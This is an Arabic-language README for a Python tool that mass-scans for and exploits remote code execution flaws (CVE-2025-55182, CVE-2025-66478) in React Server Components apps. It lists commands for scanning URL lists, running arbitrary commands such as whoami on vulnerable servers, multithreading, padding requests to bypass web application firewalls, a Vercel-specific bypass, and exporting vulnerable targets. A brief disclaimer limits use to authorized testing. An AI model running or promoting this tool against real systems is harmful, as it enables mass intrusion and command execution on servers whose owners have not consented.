
صيد جماعي واستغلال PoC لـ CVE-2025-55182 و CVE-2025-66478
أداة متعددة الخيوط وقوية للمسح والاستغلال لثغرات مكونات خادم React (RSC). صُممت هذه الأداة لاكتشاف واستغلال ثغرات تنفيذ الأوامر عن بُعد (RCE) في تطبيقات RSC، مع دعم تقنيات واستراتيجيات تجاوز متنوعة.
ملاحظة: نظرًا للتعقيد الهائل في صيانة واجهة تفاعلية كاملة وغيرها من الميزات الثقيلة، قررنا إزالتها. يركز هذا المشروع الآن فقط على معالجة الحالات الحدودية، والتحليل السلوكي، والكشف الموثوق به عن ثغرات RSC. نعتقد أن أداة أبسط وأكثر تركيزًا تخدم المجتمع بشكل أفضل.
pip install requests
مسح عنوان URL واحد للتحقق من وجود ثغرات.
python3 rschunter.py -u https://example.com
مسح قائمة عناوين URL من ملف (عنوان URL واحد في كل سطر).
python3 rschunter.py -l targets.txt
تنفيذ أمر معين على الأهداف الضعيفة (الافتراضي هو id).
python3 rschunter.py -u https://example.com -c "whoami"
حفظ قائمة الأهداف الضعيفة في ملف CSV.
python3 rschunter.py -l targets.txt --save vulnerable.csv
تفعيل حقن البيانات غير المهمة لتجاوز جدران الحماية.
python3 rschunter.py -u https://example.com --waf-bypass
تفعيل استراتيجية تجاوز Vercel الخاصة.
python3 rschunter.py -u https://example.com --vercel
توجيه حركة المرور عبر بروكسي (مفيد لتصحيح الأخطاء باستخدام Burp Suite).
python3 rschunter.py -u https://example.com --proxy http://127.0.0.1:8080
هذه الأداة مخصصة للأغراض التعليمية والاختبار المصرح به فقط. استخدام هذه الأداة لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني. لا يتحمل المطورون أي مسؤولية ولا يتحملون مسؤولية أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
| الوسيط | الوصف |
|---|
-u, --url | عنوان الهدف المراد مسحه. |
-l, --list | المسار إلى ملف يحتوي على قائمة الأهداف. |
-c, --cmd | الأمر المراد تنفيذه (الافتراضي: id). |
-t, --threads | عدد الخيوط المتزامنة (الافتراضي: 10). |
--check | الوضع الآمن: يتحقق من وجود الثغرة دون تشغيل الأوامر المخصصة. |
--waf-bypass-size | حجم البيانات غير المهمة بالكيلوبايت (الافتراضي: 128). |
-v, --verbose | تفعيل الإخراج التفصيلي لتصحيح الأخطاء. |